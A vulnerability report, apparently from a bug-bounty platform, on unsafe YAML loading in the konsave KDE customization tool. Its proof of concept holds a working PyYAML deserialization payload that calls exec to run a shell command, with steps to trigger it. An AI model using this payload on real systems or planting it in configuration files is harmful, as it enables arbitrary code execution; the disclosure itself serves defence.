Code Injection in prayag2/konsave


Reported on

Mar 10th 2021

✍️ Description

konsave is a CLI program that will let you save and apply your KDE Plasma customizations with just one command , which is vulnerable to YAML deserialization attack caused by unsafe loading leads to Arbitary Code Execution.

🕵️‍♂️ Proof of Concept


pip install konsave


payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
  • now copy conf.yaml and paste in konsave directory
  • Run the command below
    • konsave -s test

This will create a profile along with it code execution will occur

💥 Impact

Arbitary Code Execution

to join this conversation